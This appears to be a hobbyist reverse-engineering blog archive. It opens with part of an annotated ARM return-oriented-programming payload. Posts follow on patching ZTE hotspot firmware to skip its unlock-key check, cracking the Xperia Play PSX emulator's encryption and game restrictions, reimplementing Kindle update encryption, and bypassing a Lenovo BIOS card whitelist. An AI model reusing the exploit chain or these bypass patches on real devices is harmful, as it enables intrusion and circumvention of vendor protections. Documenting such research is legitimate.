0x08B47568: 0x00119B94 ; *R0 = R1 = (decoded data), LDMFD   SP!, {R4,PC}
0x08B4756C: 0x00106694 ; R4, dummy
0x08B47570: 0x00269758 ; LDMFD   SP!, {R1,PC}
0x08B47574: 0x00000004 ; R1
0x08B47578: 0x00207954 ; R0 = R0 + R1 (buffer + 4), LDMFD   SP!, {R4,PC}
0x08B4757C: 0x00130344 ; R4, dummy
0x08B47580: 0x00269758 ; LDMFD   SP!, {R1,PC}
0x08B47584: 0x08B47618 ; R1 (&buffer)
0x08B47588: 0x00140450 ; *R1 = R0 (set new buffer), LDMFD   SP!, {R4,PC}
0x08B4758C: 0x00100D24 ; R4, dummy
0x08B47590: 0x00269758 ; LDMFD   SP!, {R1,PC}
0x08B47594: 0xF70FB000 ; R1
0x08B47598: 0x00207954 ; R0 = R0 + R1 = 0xFFFFC004, LDMFD   SP!, {R4,PC}
0x08B4759C: 0x00119864 ; R4, dummy
0x08B475A0: 0x001B560C ; SET_FLAGS (R0 != 0), if (flags) R0 = 1, LDMFD   SP!, {R3,PC}
0x08B475A4: 0x002059C0 ; R3, dummy
0x08B475A8: 0x002AD574 ; LDMFD   SP!, {R0,PC}
0x08B475AC: 0x08B47610 ; R0 (val for LR)
0x08B475B0: 0x00269758 ; LDMFD   SP!, {R1,PC}
0x08B475B4: 0x08F00FFC ; R1
0x08B475B8: 0x00119B94 ; *R0 = R1 = 0x08F00FFC (next stage), LDMFD   SP!, {R4,PC}
0x08B475BC: 0x00355FD4 ; R4, dummy
0x08B475C0: 0x00269758 ; LDMFD   SP!, {R1,PC}
0x08B475C4: 0x08B474A8 ; R1
0x08B475C8: 0x0020E780 ; if (flags) *R0 = R1 = 0x08B474A8 (loop), LDMFD   SP!, {R4,PC}
0x08B475CC: 0x002C2215 ; R4, dummy
0x08B475D0: 0x0010FFFD ; (nop) POP {PC}
0x08B475D4: 0x0010FFFD ; (nop) POP {PC}
0x08B475D8: 0x00103DA8 ; LDMFD   SP!, {R4-R12,PC}
0x08B475DC: 0x002D5654 ; R4, dummy
0x08B475E0: 0x00103778 ; R5, dummy
0x08B475E4: 0x002FA864 ; R6, dummy
0x08B475E8: 0x00119B94 ; R7, dummy
0x08B475EC: 0x0020E780 ; R8, dummy
0x08B475F0: 0x00128605 ; R9, dummy
0x08B475F4: 0x00103DA8 ; R10, dummy
0x08B475F8: 0x08B475F8 ; R11, dummy
0x08B475FC: 0x0010FFFD ; R12, dummy
0x08B47600: 0x0018114C ; LDMFD   SP!, {R4-R6,LR}
0x08B47604: 0x0010FFFD ; R4, dummy
0x08B47608: 0x002FC8E4 ; R5, dummy
0x08B4760C: 0x001037E0 ; R6, dummy
0x08B47610: 0x0023C494 ; LR (later set to 0x08B474A8)
0x08B47614: 0x002D6A30 ; SP = LR, LDMFD   SP!, {LR,PC}
0x08B47618: 0x08F01000 ; buffer
0x08B4761C: 0x002D6A1C ; 
0x08B47620: 0x08B47400 ; 
0x08B47624: 0x0010FFFD ; 
0x08B47628: 0x0010FFFD ; 
0x08B4762C: 0x002D6A1C ; 
0x08B47630: L"dmc:/Launcher.dat"
0x08B47654: 0x00000000 ; 
0x08B47658: 0x00000000 ; 
0x08B4765C: 0x00000000 ; 
0x08B47660: 0x00000000 ; 
0x08B47664: 0x00000000 ; 
0x08B47668: 0x00000000 ; 
0x08B4766C: 0x002D6A1C ; 
0x08B47670: 0x00000000 ; 
0x08B47674: 0x00000000 ; 
0x08B47678: 0x00000000 ; 
0x08B4767C: 0x00000000 ; 
0x08B47680: 0x00000000 ; 
0x08B47684: 0x00000000 ; 
0x08B47688: 0x00000000 ; 
0x08B4768C: 0x00000000 ; 
0x08B47690: 0x00000000 ; 
0x08B47694: 0x00000000 ; 
0x08B47698: 0x00000000 ; 
0x08B4769C: 0x00000000 ; 
0x08B476A0: 0x00000000 ; 
0x08B476A4: 0x00000000 ; 
0x08B476A8: 0x00000000 ; 
0x08B476AC: 0x00000000 ; 
0x08B476B0: 0x00000000 ; 
0x08B476B4: 0x00000000 ; 
0x08B476B8: 0x00000000 ; 
0x08B476BC: 0x00000000 ; 
0x08B476C0: 0x00000000 ; 
0x08B476C4: 0x00000000 ; 
0x08B476C8: 0x00000000 ; 
0x08B476CC: 0x00000000 ; 
0x08B476D0: 0x00000000 ; 
0x08B476D4: 0x00000000 ; 
0x08B476D8: 0x00000000 ; 
0x08B476DC: 0x00000000 ; 
0x08B476E0: 0x00000000 ; 
0x08B476E4: 0x00000000 ; 
0x08B476E8: 0x00000000 ; 
0x08B476EC: 0x00000000 ; 
0x08B476F0: 0x00000000 ; 
0x08B476F4: 0x00000000 ; 
0x08B476F8: 0x00000000 ; 
0x08B476FC: 0x00000000 ; 

Unlocking T-Mobile 4G Hotspot (ZTE MF61): A case study

So, I have one of these MiFi clone from T-Mobile and want to unlock it to use on AT&T (I know that AT&T 4G/3G isn’t supported, but I thought maybe I could fix that later). The first thing I tried to do was contact T-Mobile, as they are usually very liberal concerning unlock codes. However, this time, T-Mobile (or, as they claim, the manufacture) isn’t so generous. So I’ve decided to take it upon myself to do it. I will write down the entire procedure here as a case study on how to “reverse engineer” a new device. However, in no way do I consider myself an expert, so feel free to bash me in the comments on what I did wrong. Also, I have decided against releasing any binaries or patches because phone unlocking is a grey area (although it is legal here), but if you read along you should be able to repeat what I did, even though I will also try to generalize.

Getting information

The hardest part of any hack is the figuring-out-how-to-start phase. That’s always tricky. But… let the games begin.

-Wheatley, Portal 2

So before we can do anything, we need to know what to do. The best place to begin is to look at the updater. A quick look at the extracted files, we find that the files being flashed have names such as “amss.mbn”, “dsp1.mbn”, and such. A quick scan with a hex editor, we see that the files are unencrypted and unsigned. That’s good news because it means we have the ability to change the code. A quick Google search shows us that these files are firmware files for Qualcomm basebands. Now, we need to find more information on this Qualcomm chip. You may try some more Google-fu, but I took another path and took apart the device (not recommended if it’s any more complicated). In this case, I found that we are dealing with a Qualcomm MDM8200A device. Google that and you’ll find more information such as there are two DSP processors for the modem and on “apps” ARM processor (presumably for T-Mobile’s custom firmare, and is what you see as the web interface). We want to unlock the device, so I assume the work is done in the DSP processor. That’s the first problem. QDSP6 (I found this name through more Google skills) is not a supported processor in IDA Pro, my go-to tool, so we need another way to disassemble it.


Some more Googling (I’m sure you can see a pattern on how this works now) leads me to this. QDSP6 is actually called “Hexagon” by Qualcomm and they kindly provided an EBI and programmer’s guide. I guessed from the documents that there is a toolchain, but no more information is provided about it. More searching lead me to believe that the in-house toolchain is proprietary, but luckily, there is an open source implementation that is being worked on. Having the toolchain means that we can use “objdump”, the 2nd most popular disassembly tool [Citation Needed]. So, it’s just a matter of sending dsp1.mbn and dsp2.mbn into objdump -x? Nope. It seems that our friends at ZTE either purposely or automatically (as part of the linker) stripped the “section headers” of the ELF file. I did a quick read of the ELF specifications and found that the “section headers” are not required for the program to run, but provides information for linking and such. What we did have was the “program headers”, which is sort of a stripped down version of the section headers. (Program headers only tell: 1) where each “section” is located in file and where to load it in memory, 2) is it program or data?, 3) readable? writable?, while section headers give more information like the name of each section and more on what the program/data section’s purpose is). What I then did is wrote my own section headers using the program headers as a guide and made up the names and other information (because they are not used in the actual disassembling anyways) with a hex editor. Then I pasted my headers into the file, changed some offsets, and objdump -x surrendered the assembly code. 180MB worth of it.


So we have 180MB worth of code written in a language that could very well be greek. Luckily, as I’ve mentioned earlier, Qualcomm released a document detailing the QDSP assembly language and how it’s used. Most likely, you would be dealing with a more “popular” processor like ARM or x86 and would have access to more resources. However, for QDSP6/Hexagon, we have two PDF documents and that is basically the Bible that we need to memorize. I then spend a couple of hours learning this new assembly language (assembly isn’t that hard once you embrace it) and figured out the basics needed to reverse engineer (that is: jumps, store/loads, and arithmetic). Now, another problem arises. We have literally 3 million lines of assembly code with no function names, no symbols, and no “sections”. How do we find where the goal (the function that checks the NCK key and unlocks the device accordantly) without spending the next two years decoding this mess? Here, we need to do some assumptions. First, we know   (through Google) that the AT modem command for inputting the NCK key is AT+ZNCK=”keyhere” for ZTE devices. So, let’s look for “ZNCK” in the hex editor of dsp1.mbn and dsp2.mbn. (If you are not as lucky and don’t know what the AT command is, I would put money that the command will contain the word NCK, so just search that). In dsp2.mbn, we find a couple of results. One of the results is in a group of other AT commands. Each command is next to a 4-byte hex value and a bunch of zero padding. I would guess that it is a jump table and the hex values are the memory locations of the functions to jump to. Doing a quick memory to file offset conversion (from our ELF program header), we locate the offset in our disassembly dump to find that it starts an “allocframe” instruction. That means we are at the beginning of a function so our assumptions must be right. Now, we can get to the crux of the problem, which is figuring out how the keycheck works.

Mapping out the functions

We now know where the function of interest starts, but we don’t know where it ends. It’s easy to find out though, look for a jump to lr (in this case for this processor, it’s a instruction to jump r31). We start at the beginning of the function and we copy all the instruction until we see a non-conditional jump. We paste the data into another text file (for easier reference). Then we go to the next location in the disassembly (where it would have jumped to) and copy the instruction until we see another non-conditional jump, and then paste them into the second text file. Keep doing this until you see a jump to r31. We now have most of the function. Notice I kept saying “non-conditional” jumps. That’s because first, we just need the code that ALWAYS runs, just to filter out stuff we don’t need. Now, we should get the other branches just so we have more information. To do this, just follow each jump or function call in the same way as we did for the main function. I would also recommend writing some labels like “branch1″ and “func1″ for each jump just so you can easily locate two jumps to the same location and such. I would also recommend only doing this up to three “levels” max (three function calls or three jumps) because it could get real messy real quick, and we will need more information so we can filter out un-needed code, as I will detail in the next section.

Finding data references

Right now, we are almost completely blind. All we know is what code is run. We don’t know the names of functions or what they do, and it would take forever to “map” every function and every function every function calls (and so on). So we need to obtain some information. The best would be to see what data the code is using. For this processor (and likely many others), a “global pointer” is used to refer to some constant data. So, look for references to “gp” in the disassembly. Searching from the very beginning of the program, we find that the global pointer is set to 0×3500000, and according to the ELF headers, that is a section of the dsp2.mbn file at some file offset. In the section we care about, look for references to “gp” and use the offsets you find to locate the data they refer to. I would recommend adding some comments about them in the code so we don’t forget about them. Now, the global pointer isn’t everything, we can have regular hard-coded pointers to constant areas of memory. Look for setting of registers to large numbers. These are likely parameters to function calls that are too big to be just numerical data and are more likely pointers. Use the ELF header to translate the memory locations to file offsets. In this case (for this processor), some values may be split into rS.h and rS.l, these are memory locations that are too “large” to be set in the register at once. Just convert rS.h into a 16 bit integer, rS.l into a 16 bit integer (both might require zero padding in front), then combine them into one 32 bit integer where rS.h’s value is in front of rS.l’s value. For example, we have: r1.h = #384; r1.l = #4624. That will make r1 == 0×1801210. You should also make some comments in the code about the data that is being used. Now, predict standard library calls. This may be the hardest step because it involves guessing and incorrect guessing may make other guess more wrong. You don’t have much information to go by, but you know 1) the values of some of the data being passed into function calls, and 2) library calls will usually be near the start of the program, or at least very far away from the current function. This will be harder if the function you are trying to map is already near the beginning of the program. The function I’m mapping is found at 0xf84c54, and most function calls are close to it. When I see a function call to 0xb02760, I know that it might be a library call. 3) Some of the more “common” functions and the types of parameters they accept. You don’t need to figure out all of the library calls, just enough to get an idea of what the code is doing so you don’t try to map out these functions (trying to map out strcpy, for example will get messy real quick). For example, one function call, I see is taking in a data pointer from a “gp” offset, a string that contains “%s: %d”, and some more data. I will assume it is calling fprintf(). I see another function is being called many times throughout the code, and it always accepts two pointers where the second one may be a constant and a number. I will assume it is calling memcpy().


This may be the most boring part. You should have enough information now to try to write a higher language code that does what the assembly code says. I would recommend doing this because it is much easier to see logic this way. I used C and started by doing a “literal” transcription using stuff like “r0-r31″ as variable names and using goto. Then go back and try to simplify each section. In my process, I found that how the unlock key is checked is though sort of a hash function. It takes the user input, passes it through a huge algorithm of and/or/add/sub of more than 1000 lines and takes the result and compares it to a hard coded value in the NV ram (storage area for the device). Here, I made a choice to not go through and re-code this algorithm for two reasons. First, it would be of little use, as the key check doesn’t use a known value like the IMEI and relies on a hard coded value in the NV ram that you need to extract (which a regular user might have trouble doing). Second, after decoding it, we would have to do the algorithm backwards to find the key from the “known value” in the NV ram (and it could be that it would be impossible to work backwards). So I took the easy way out and made a 4-byte patch in where I let the program compare the known value to itself instead of to the generated hash from the input and flashed it to the device. Then I inputted a random key, and the device was unlocked.

Now, remember at the beginning I said the code was unsigned? Because of that I could easily have reflashed the firmware with my “custom” code. However, if your device has some way of preventing modified code from running, you may have no choice but to decode the algorithm.

Reversing the Xperia Play emulator (part deux)

The last time we spoke, I managed to run any PSX game on the Xperia Play by redirecting some function calls. Well, since then Sony (you could say) fixed it (still don’t know how, I should look into it one day, I’m guessing they revoked the certificates for Crash Bandicoot) and people running Android 2.3.4 on the Xperia Play can’t use PSXPeria anymore. I’ve re-patched it a while ago, but never got the chance to modify the patching tool to use the new method (I really hate Java and don’t want to use it, so I held back.) until today. As customary to my releases, I will begin by telling more than what you want to know about how it works.

Previously on “cracking the emulator”…

If you haven’t read the last posts I’ve made about how I reverse engineered the emulator data format and binary, you may want to, but I’ll summarize it in a few words. Basically, the emulator was separated into two binaries bin-one decrypts bin-two and bin-two asks bin-one to decrypt and load the game’s table-of-contents which is used to load the game. The TOC is important because anyone can replace the game data files, but it won’t load because the TOC contains addresses of the places to decompress in the game data. Well, after the hard part of reversing the formats and finding all this out, the actual patch was fairly easy. All we did was make a new library with the same function name as the one that is used by bin-two to query bin-one for the TOC, and use it to load the TOC for our custom game and make sure that library loads before Sony’s and the rest is almost magic. We don’t need to overwrite any function pointers or even touch the emulator because the linker looks for the first definition of a function and calls it.

How Sony made our lives harder

So version 1 is always easiest to break. This applies for almost everything. The PSP, the iPhone, the DS, etc. Version 2 is where it gets real. So what are the changes? First of all, no more bi-binary system. There is a single binary that does both the decrypting and emulating. Oh, and they removed the symbols so we can no longer search for “GetImageToc” and find where the function is. Also, they’ve started verifying that ISOs.

Finding the needle

Before we can begin to think about patching, we first need to find what to patch. As I’ve mentioned, Sony removed the symbols, so we no longer know what the function names are. We CAN try to map out the entire binary (10MB) and look for something that does what appears to be decrypting a TOC, but we don’t have months or a team of assembly experts. What we DO have is the older version of the binary that has the symbols. Assuming that they didn’t rewrite the emulator from scratch, the structure should be similar. We open up the old binary, find the function that calls the ones we want to patch, and look for identifying characteristics. What are they? Well, we look for mentions of unique strings and unique calls to standard functions (unique as in something like atoi, not malloc, which is called every other line). Luckily we have both. It seems like a few lines before the function we are interested in, the program does something with the string “/data/” and sometimes afterwards, uncompress is called. Now we have the address of the functions we want to patch.

Patching the function

Well, here’s our second problem. What do we patch the function with? We are only limited to the length of what the function originally is, but I’m sure that’s not a problem for experts. I’m not an expert though, so how about we steal what Sony did in version 1? We use dlsym to call the function from a loaded binary in memory. After a quick trip to an assembly reference, I wrote the following code:, I would go into more details, but I believe my comments on the code explains it better than I could. The only other thing we need is to manually define the address for “dlsym” and the offset for the name of the function. ARM assembly uses relative address, so I haven’t come up with a quick way to do this yet. For now, I’m using a calculator and a piece of paper to find the address of dlsym relative to the patch in the program. Comment if you have a better way.

Phase 2

When the game didn’t boot and was frozen on screen, I knew it had to be another obstacle. Our code had to have worked because otherwise, it would have crashed. Debugging with GDB, it seems like the program is blocking forever, seemingly on purpose. To double check, I loaded Crash Bandicoot again, but with my patched emulator and it worked. So, I guess there was a check somewhere that only loads Crash Bandicoot. Yes, I could go back into IDA and look for where the check is and NOP it out, but I was tired by then and my short attention span wants me to work on something else, so I took the easy way out and patched the PSX image with the titleid for Crash Bandicoot. As far as I know, this shouldn’t affect anything in terms of compatibility, but farther tests are needed.

Next week on “cracking the emulator”…

Version 3 of the emulator is already out and is distributed in the PS-Suite games in the Japanese PSN store (on the Play). I already took a look at it, and the emulator did not seem to be updated, so I didn’t try hard to patch it. However, it seems that they implemented many new security mechanisms in the PS-Suite PSX games. For starters, there is a public-private key exchange to make sure all the files in the APK are untouched, and I’m pretty sure the PS-Image is now encrypted or the format has changed. Now, Sony did not do all this to prevent us from loading our own games (or maybe they did). I suspect it’s to prevent pirates from stealing the PSN games. Which means that if I crack the version 3 emulator, I may be helping piracy. This means, I will most likely not touch the PS-Suite emulators, and if I do, two things have to happen. 1) I need to be sure that the emulator has much better compatibility, and 2) I need a way to make sure that my tool isn’t going to be used for piracy. So I guess this may be the last release for a while.


Project Page

Reverse engineering a dynamic library on the Xperia Play

Welcome to part two of my journey to completely reverse the PSX emulator on the Xperia Play. When we last left off, I managed to figure out the format and the basic order of execution of the emulator. It’s been a week now, and I have more stuff to reveal.

Decrypting the data

One of the main problems was that most of the important files are encrypted. More specifically, these three files: ps1_rom.bin (BIOS), (the emulator), and image_ps_toc (then unknown data). As I mentioned before, Sony used what’s called white box cryptography, which means obfuscating the code to hide the decryption keys. But, we don’t need the keys, we just need the decrypted data. The obvious way of extracting the decrypted data is dumping it from the RAM. However, the Android kernel I’m using doesn’t support reading /dev/kmem and I don’t want to mess with recompiling the kernel. I’ve also tried dumping with GDB, and it did work, but the data isn’t complete and is messy. I used a more unorthodox method of obtaining the decrypted data. After hours of reading and mapping in IDA Pro, I figured out that everything that is decrypted goes through one public function, uncompress(), a part of zlib. This is important, because this means everything that is decrypted is sent to zlib and zlib is open source. That means, I just need to recompile zlib with some extra code in uncompress() that will dump the input and output data. A simple fwrite() will do, as the data is already in a clean, memcpy-able form. (I forgot about LD_PRELOAD at the time, but that might have worked easier). After some trouble getting NDK to compile zlib, I have dumps of both the compressed/decrypted and uncompressed forms of all encrypted content.

Analyzing the dumps

The next thing is to find out the meaning of the data that we worked so hard to get. ps1_rom.bin is easy. Surprisingly, it is NOT a PS1 BIOS file, but actually part of a PS2 BIOS dump (part, being only the PS1 part of the PS2 BIOS). Does this mean a PS2 emulator is coming for the Play? I don’t know. Next, we have Plugging it into IDA Pro reveals the juicy details of the PS1 emulator. It’s really nothing interesting, but if we ever want multi-disk support or decrypting the manuals, this would be the place to look. Finally, we have image_ps_toc (as it is called in the symbols file). I am actually embarrassed to say it took almost a day for me to figure out that it’s a table of contents file. I did guess so at first, but I couldn’t see a pattern, but after a night’s sleep, I figured out the format of the uncompressed image_ps_toc file. (Offsets are in hex, data are little-endian)

0×4 byte header

0×4 byte uncompressed image size

0×12 byte constant (I’m guessing it may have something to do with number of disks and where to cut off)

0×4 byte number of entries

Each entry:

0×4 byte offset in, where the compressed image is split format

I actually forgot to mention this in my last post. The “rom” that is loaded by the emulator is a file named It is found on the SD card inside the ZPAK. It is unencrypted, and if you delete it, it will be downloaded again from Sony’s servers unencrypted. How it works is that an PSX ISO is taken and split into 0×9300 (about 38kb) sections, and each section is compressed using deflate (zlib again) and placed inside (with a 0×14 byte header). The offsets of each section is stored in the toc file (and encrypted) because although uncompressed, they’re perfect 38kb sections, compressed, they’re variable sized. I already wrote a tool to convert to an ISO and back again/

Putting it all back together

Now that we’ve tore apart, analyzed, and understood every element of the PSX emulator on the Xperia Play, what do we do? The ultimate goal is to convert any PSX game to run on the Xperia Play, but how do we do that. There are two main challenges. First of all,, which loads everything, expects data to be encrypted. Once again, we need keys. Also, I’m pretty sure it uses a custom encryption technique called “TFIT AES Cipher”, because I was not able to find information on it anywhere else. However, since we have the decrypted files, we can patch the library to load the decrypted files directly from memory, and I was halfway into doing that when I realized two more problems. Secondly, if I were to patch the library to load decrypted data, that means every user needs to decrypt the files themselves (because I won’t distribute copyrighted code). Third, image_ps_toc is variable sized, which means if the image is too big, it’ll break the offsets and refuse to load.

Currently, I’m trying to find the easiest and most legal way of allowing custom image_ps_toc files to work. (Bonus points if I can also load custom BIOS files). What I hope for is to write a wrapper library,, which loads and patches GetImageTOC and GetImageTOCLength to load from a file instead of memory. This means I have to deal with Java and JNI again (ugh), and also do some weird stuff with pointers and memcpy (double ugh). The JNI methods in the library do not have their symbols exported, so I have to find a way of manually load them.

Bonus: blind patching a binary

When trying to patch a method for an ARM processor, it’s a bit of a pain and I’m too lazy to read about proper GDB debugging techniques. In additions, Sony wasn’t kind enough to compile everything with debugging symbols. However, I came up with a hacky-slashy way of changing instructions and seeing what happens. First, open up IDA Pro and find the function you want to modify. For example, I want decrypt_executable() to bypass decryption and just copy data plain. Find the instruction to change, and the opcode to change it to. For example, I want to change a BL instruction to NOP and CMP to CMN (don’t jump to decryption process and negate the “return == 0″). I have ARM’s NOP memorized by now 00 00 A0 E1. I don’t know what CMN’s opcode is, but if I look around I can find CMN somewhere and I see it’s just a change from a 7 to a 5. After everything’s done, copy it over to the phone and run it. If it crashes (and it should), look at the dump. The only important part is the beginning:

I/DEBUG   (  105): signal 11 (SIGSEGV), code 1 (SEGV_MAPERR), fault addr 00000054
I/DEBUG   (  105):  r0 002d9508  r1 413c103c  r2 2afcc8d0  r3 002d93d8
I/DEBUG   (  105):  r4 00000004  r5 002d93e0  r6 6ca9dd68  r7 00000000
I/DEBUG   (  105):  r8 7e9dd478  r9 2cbffc70  10 0000aca0  fp 6caa4d48
I/DEBUG   (  105):  ip 002d93e8  sp 7e9dd0c0  lr 00000001  pc 4112d01c  cpsr 40000010

The error message doesn’t help at all “SIGSEGV,” but we have a dump of all the registers in the CPU. The important one is the PC (program counter), which shows what offset the last instruction was at offset 0x4112d01c in the memory. To get the program offset, just cat /proc/{pid}/maps to find where is loaded in memory. Subtract the offsets, and pop it into IDA pro. Now figure out why it crashed and try again. I need to learn proper debugging techniques one day.

Analyzing the PSX emulator on the Xperia Play

I’ve been playing around with the new Xperia Play (well, with the speed of these Android phone releases, it’s already old). I’ve decided it would be a challenge to try to figure out how the PSOne emulator works and eventually be able to inject any ISO and play it with Sony superior PS1 emulator. Just to be clear, nothing is done yet, and this is just a technical post to aid whoever else is trying to do the same thing. Also, because information should be free.

Decompiling and disassembling

Before we can do any analyzing, we need to break everything open. I found a couple of useful tools to aid with reverse engineering Android applications. First up is apktool, which is like an all-in-one Android app decompression and decompilation tool. It uses various other tools to do stuff like decompress resources, convert the meta files to be readable, and use baksmali to disassemble Dalvik bytecode to assembly code. Another useful tool is dex2jar, which converts Dalvik bytecode to regular Java bytecode and generates a jar that can be decompiled to Java code using a decompiler like, my favorite, JD-GUI. Last, but not least, we have the big guns: IDA Pro, which I’ve used religiously for many projects. If you don’t know, it can disassemble almost any binary, including native ARM libraries.

Stepping through

The first thing to do once we reversed all the code is to read it. A good way to start is to follow an application from start to finish through the code. Looking in the Android manifest file, we find the main activity that is started is We open that up, look at onCreate() and read what it does, follow whatever methods it calls and read through all those too. It may get a bit complicated, so I suggest thinking like a stack. From what I can understand, the first thing the app does is check if the data is downloaded. “Crash Bandicoot” is a 500MB game, so it would use up all the system space, so what Sony did is pack the binaries into the APK installed on the system, and the game data (textures, images, etc) is a ZPAK (renamed PKZIP) file that is downloaded from their servers if deleted. Once the data is verified to exist or downloaded from Sony’s servers, the baton is passed to a native JNI library to do the actual work.

Native code

Sony sees the Xperia Play not as just an Android phone, but a game platform. They call it “zplatform”, or as I guess: Zeus Platform (Zeus was the codename for the Xperia Play). The platform APIs is found on, which is linked by all platform compliant (read: only on Play) games. It contains functions for extracting/creating ZPAK files as well as a lot of encryption/decryption commands and other stuff like networking. Another library is, which contains the actual emulator. Well, sort of. contains almost 2MB worth of crypto-security functions. It’s sole purpose is to decrypt and load into memory, three files (two of which are stored encrypted inside They are: image_ps_toc (I can only guess it relates to the ROM file,, ps1_rom.bin (the PS1 BIOS, found in the data ZPAK), and (the main executable, aka: the emulator).

ZPAK files

The ZPAK file is basically a ZIP file that stores the game data. I only looked through “Bruce Lee” and “Crash Bandicoot”, but from what I can see there, all ZPAK files contain a metadata XML and one or more encrypted data files. For example, Crash Bandicoot’s ZPAK data contains, which I can guess from the size, is the ROM file for the game. I do not know if it’s an ISO or if it’s compressed, but that’s not important right now. There’s also ps1_rom.bin, which I can say for certain after reading the code to decrypt it, is the PS1 BIOS file, compressed using zlib. There’s also pages from the manual named for their page number and have no extensions. I can assume that they’re encrypted too because they contain no image header and the first two bytes are not the same throughout. The main thing I need to figure out is if the encryption key is common or not.

The white box

The main executable,, is completely encrypted and obfuscated by, which implements a white box security. If you read anything about white box cryptography (Google), you’ll see that it’s sole purpose in existence is to prevent itself from being reverse engineered. It hides the decryption key in a giant table or an even bigger finite-sized key. Nevertheless, it would take someone, a group of people smarter than me (not that that’s hard to find) to crack this file.

What’s next

Unfortunately, that’s all I know for now. Why? Because the CDMA version of the Xperia Play has not been rooted yet, and any farther analysis would require client access. I’m in the process to locating a R800i model of the Play to test with, but for now, I hope that someone who knows what they’re doing reads this and continue where I left off.

There are two giant problems that’s preventing us from injecting any PS1 image into the emulator. First of all, everything is encrypted. My hope is that it’s a single key used in zplatform (seeing that there’s functions such as zpCryptDecrypt and zpCryptEncrypt in the platform APIs) is used by Sony to encrypt and the manuals. Second of all, we need, the emulator. This may be easier then imagined. White box cryptography is used to hide the decryption key, not the decrypted content. My hope is that is loaded into RAM after decrypts it. There is a high chance of that because it would be hard to hide an executable and run it at the same time. If that is the case, disassembling the emulator will produce more results. If you have a rooted Xperia Play, set up USB debugging, and open up Crash Bandicoot. Connect the Play, and call “adb shell dd if=/dev/mem > memdump.bin” and then “adb shell dd if=/dev/kmem >> memdump.bin” (I don’t know which one would work, so try both). That will (hopefully) produce a memory dump that will contain the emulator executable. Once we have this, even if we cannot decrypt, it may be possible to write an alternative wrapper application that will load ISOs or something.

Porting Kindle 3.1: Part 2 – Update encryption


So, on the topic of Kindle (I swear, it’s becoming an obsession). I am currently in the process of porting the Kindle 3.1 software to Kindle 2 and DX. I will make a series of posts describing my process while describing how various parts of the Kindle operating system works. Now I’ve tested 3.1 on my Kindle 2 and it works perfectly fine. All features work (audio, TTS, book reading), and the new features also work without major slowdowns (new PDF reader, new browser, etc).

Where’s part one you ask? Well, part one was getting the 3.1 OS to work on the Kindle 2, the rest is making an easy installer. That is a long story that involves custom partition tables, manually creating tar files (checksums are a pain), remote debugging, and more. It’s a lot of stuff and most aren’t very useful because nobody should have to repeat the process, which is why I’m creating a easy to use installer. If I have time one day, I may write it down for documentation purposes.

First of all, I will write down the game plan. What I plan to do is create an installer with the least amount of steps for the user. I’m hoping for a two part or three part installer. (Can’t be one part because you need a copy of the OS, and distributing it is most likely frowned upon by Amazon). How the installer should work is:

  1. User copies a image-creator package on a jail-broken Kindle 2. This package will backup the original OS, and generate a new ext3 image with some required files from the Kindle 2 (drivers and such). It will also update the kernel to support recovery packages.
  2. User keeps backup in a safe place and copies the image-creator package and the image generated from the K2 on a jail-broken Kindle 3 and runs the package. The image-creator will scan the filesystem making sure all files exist are are unmodified, then copies the files to the ext3 image. It will then take the ext3 image and generate a Kindle 2 recovery package with the 3.1 OS.
  3. User copies the recovery package generated from the Kindle 3 and copies it to the Kindle 2 and restarts. The Kindle will write the ext3 image to the root partition.

Update Encryption

Now, Igor Skochinsky wrote a nice post a couple of years ago on the Kindle update encryption algorithm. Basically, to encrypt an update, you take each byte of the file and shift the bits four to the left and OR it with the same bits shifted four to the right. Then you AND the result by 0xFF and XOR it by 0x7A. (Sounds like some computer dance move). Well, Igor also wrote a nice Python script that does the encrypting and decrypting, but I didn’t want to port Python to Kindle, so I decided to modify Amazon’s update decryption script “dm” and reverse it to make a encryption script “md”. I opened up IDA Pro and looked for the encryption. Here it is nicely commented by me into psudocode:

BL getchar // get byte to modify

EOR R3, R0, #0x7A // R3 = R0 ^ 0x7A

CMN R0, #1 // if !(R0 == 1), we are at the end of the file …

MOV R0, R3,LSR#4 // R0 = R3 >> 4

AND R0, R0, #0xF // R0 = R0 & 0xF

ORR R0, R0, R3,LSL#4 // R0 = R0 | R3 << 4

BNE loc_8470 // … then jump to end of program

MOV R0, #0 // clear R0 register

ADD SP, SP, #4 // don’t care

LDMFD SP!, {PC} // don’t care

It was a simple matter of reversing the instructions and registers, but like I said before, IDA Pro does not allow changing instructions directly, so I had to mess around with the machine code in the hex editor until I made the instructions I want. Here’s the modified function nicely commented by me in human.

BL getchar // get byte to modify

CMN R0, #1 // if byte is 0×01, then …

MOV R3, R0,LSR#4 // set R0 to R0 right shift 4

AND R3, R3, #0xF // set R4 to R4 logical AND 0xF

ORR R3, R3, R0,LSL#4 // set R3 to R3 logical OR ( R0 left shift 4 )

EOR R0, R3, #0x7A // set R0 to R3 logical exclusive OR 0x7A

BNE loc_8470 // … exit program

MOV R0, #0 // clear register R0

ADD SP, SP, #4 // don’t care

LDMFD SP!, {PC} // don’t care

If you want to try it out, here’s the bspatch from “dm” to “md”. MD5 of dm is 6725ac822654b97355facd138f86d438 and after patching, md should be 3b650bcf4021b41d70796d93e1aad658. You can copy md to your Kindle’s /usr/sbin and test it out:

echo ‘hello world’ | md > hello.bin # “md” encrypt ‘hello world’ and output to hello.bin

cat hello.bin | dm # “dm” decrypt hello.bin and it should output ‘hello world’

Now that we can create update packages from the Kindle, I can start working on the Kindle 2 image-creator script.

Quickguide: Bypassing Lenovo S10 BIOS Whitelist

Lenovo loves to assert their dominance to you by whitelisting what WWAN (3G modem) card you can install in your laptop. There has been a way to bypass or remove the whitelist on most models, except the S10. Now I found a great guide here: that shows you how the remove the whitelist, but as many found out, it doesn’t always work. The problem is that… well, I don’t know what the problem is, but I’m guessing there’s additional checks. I’ve been trying to find the format of the S10 whitelist, but I’m having no luck, so we’ll do it the easy way. Brute force. Put your WWAN card into every whitelist entry. It’ll have to work then, right?

Now this is a “quickguide” which means I won’t spoon feed you. This is mostly because I don’t have the time to write a full guide, but maybe if I ever find the format of the whitelist or find a way to disable it completely, I’ll write an actual guide.

Basically, follow sbbala’s guide up until “Save and now you can close the hex-editor.” Instead of pulling out after replacing one entry, we’re going to replace a couple of others in MISER00.ROM. Take the PID/VID (little-endian reversed) and replace the follow entries with it:

DB 0B 00 19 (this one was in the guide)

D1 12 01 10 (this one will appear twice, replace both)

D1 12 03 10

C6 05 01 92

D2 19 F1 FF (this one will appear twice, replace both)

